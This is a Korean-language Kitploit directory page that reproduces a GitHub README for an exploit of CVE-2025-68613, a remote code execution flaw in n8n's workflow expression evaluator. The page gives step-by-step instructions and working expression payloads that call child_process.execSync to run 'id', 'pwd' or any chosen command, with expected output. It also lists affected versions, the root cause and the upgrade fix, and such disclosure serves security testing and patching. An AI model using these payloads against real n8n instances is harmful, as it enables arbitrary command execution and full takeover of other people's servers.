Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
n8n-CVE-2025-68613-exploit — CVE-2025-68613: n8n RCE 취약점 익스플로잇 및 문서 | Kitploit
도구/GitHubGitHub/wioui/n8n-cve-2025-68613-exploit
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubwioui/n8n-cve-2025-68613-exploit

n8n-CVE-2025-68613-exploit

CVE-2025-68613: n8n RCE 취약점 익스플로잇 및 문서

저장소 보기
1062228개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

n8n - CVE-2025-68613: 동적으로 관리되는 코드 리소스의 부적절한 제어

취약점

n8n은 워크플로 표현식 평가 시스템에 치명적인 임의 코드 실행 취약점을 포함하고 있습니다. 특정 조건에서 워크플로 구성 중 인증된 사용자가 제공한 표현식이 기본 런타임에서 충분히 격리되지 않은 실행 컨텍스트에서 평가될 수 있습니다.

영향을 받는 버전

  • 취약한 버전: n8n < v1.122.0
  • 패치된 버전: n8n >= v1.122.0

요구 사항

  • n8n 인스턴스에 대한 인증된 접근
  • 워크플로 생성/편집 권한

재현 단계

1. 새 워크플로 생성

  • "Add workflow" 클릭

2. 노드 추가

  • "Manual Trigger" 노드 추가
  • "Set" 노드 추가(트리거에 연결)

3. 페이로드 구성

  • Set 노드 클릭
  • "Add Value" 클릭 → "String" 선택
  • 필드 이름을 "result"로 지정
  • "=" 아이콘을 클릭하여 표현식 모드 활성화

4. 페이로드 주입

다음 페이로드를 표현식 필드에 붙여넣기:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

5. 실행

  • "Execute step" 클릭
  • Set 노드 출력에서 명령 결과 확인

CVE-2025-68613 익스플로잇 데모

페이로드 예시

ID 명령:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

PWD 명령:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString() })() }}

사용자 지정 명령 템플릿:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('COMMAND').toString() })() }}

예상 출력

id 명령의 경우:

root@kitploit:~
uid=1000(node) gid=1000(node) groups=1000(node)

pwd 명령의 경우:

root@kitploit:~
/app

근본 원인

표현식 평가기에는 함수 표현식이 this.process(Node.js 프로세스 객체)에 접근하는 것을 방지하는 새니타이저가 없어 시스템 모듈에 접근할 수 있습니다.

영향

  • 임의 명령 실행
  • 파일 시스템 접근
  • 환경 변수 노출
  • 완전한 시스템 장악

완화 조치

n8n v1.122.0 이상으로 업그레이드하십시오.

참조

  • 수정: https://github.com/n8n-io/n8n/commit/08f332015153decdda3c37ad4fcb9f7ba13a7c79
  • 저장소: https://github.com/n8n-io/n8n
  • 블로그 게시물: https://blog.ogwilliam.com/post/n8n-rce-vulnerability-cve-2025-68613

고지사항: 이 정보는 샌드박스 및 교육 목적으로만 제공됩니다. 이 정보를 사용하여 시스템을 무단으로 악용하는 것은 불법적이고 비윤리적입니다. 취약점을 테스트하거나 악용하기 전에 항상 적절한 승인을 받으십시오.

도구 다운로드